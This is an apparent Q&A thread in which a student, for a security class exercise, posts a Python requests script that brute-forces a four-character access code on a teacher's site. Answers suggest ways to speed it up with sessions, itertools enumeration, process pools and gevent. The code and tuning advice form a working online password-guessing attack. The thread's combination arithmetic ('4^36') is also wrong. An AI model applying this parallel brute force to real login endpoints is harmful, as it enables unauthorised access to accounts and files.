# Slow brute force program in python

Tags: python, python-requests, brute-force

So here's the problem, our security teacher made a site that requires authentification and then asks for a code (4 characters) so that you can access to a file. He told us to write a brute force program in Python (any library we want) that can find the password. So to do that I wanted first to make a program that can try random combinations on that code field just to have an idea about the time of each request ( I'm using requests library) and the result was disapointing each request takes around 8 secs.
With some calculations: 4^36=13 436 928 possible combination that would take my program around 155.52 days.
I would really apreciate if any one can help me out to make that faster. ( he told us that it is possible to make around 1200 combinations per sec)

Here's my code:

```
import requests
import time
import random

def gen():
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    pw_length = 4
    mypw = ""

    for i in range(pw_length):
        next_index = random.randrange(len(alphabet))
        mypw = mypw + alphabet[next_index]

    return mypw

t0 = time.clock()
t1 = time.time()

cookie = {'ig': 'b0b5294376ef12a219147211fc33d7bb'}

for i in range(0,5):
    t2 = time.clock()
    t3 = time.time()
    values = {'RECALL':gen()}
    r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
    print("##################################")
    print("cpu time for req ",i,":", time.clock()-t2)
    print("wall time for req ",i,":", time.time()-t3)

print("##################################")
print("##################################")
print("Total cpu time:", time.clock()-t0)
print("Total wall time:", time.time()-t1)
```

Thank you

Comment: What happens when you use a [`Session()` object](http://docs.python-requests.org/en/latest/user/advanced/#session-objects) and thus let `requests` re-use the TCP connection?

Comment: And don't use random passwords; use `itertools.product(alphabet, repeat=4)` to generate all combinations (use `''.join(combo)` to re-join the 4 characters into one string).

Comment: Thank you, I'll modify that password generation method. Can you explain that session idea little bit more?

Comment: When I use Session() object the request takes around 3 seconds which is still too much

Answer (score 1):

A thing you could try is to use a [Pool of workers](https://docs.python.org/2/library/multiprocessing.html?highlight=multiprocessing#using-a-pool-of-workers) to do multiple requests in parallel passing a password to each worker. Something like:

```
import itertools
from multiprocessing import Pool

def pass_generator():
    for pass_tuple in itertools.product(alphabet, repeat=4):
        yield ''.join(pass_tuple)

def check_password(password):
    values = {'RECALL': password}
    r = requests.post('http://www.example.com/verif.php', stream=True, cookies=cookie, data=values)
    # Check response here.

pool = Pool(processes=NUMBER_OF_PROCESSES) 
pool.map(check_password, pass_generator())
```

Comment: Thank you for the idea, but is there an optimal number of processes ?

Comment: You should have to experiment, start from 2 times the number of cores you have, since this is I/O bound you should go higher but after some point you'll have performance issues.

Comment: I have i5 processor, so it's 4 cores. So I should go from 8 processes? If I use 8 processes, and requests takes around 8secs that would still take too long.

Comment: Another approach that seems to be probably better than the one above is described here, it is based on gevent: http://stackoverflow.com/a/27016937/380038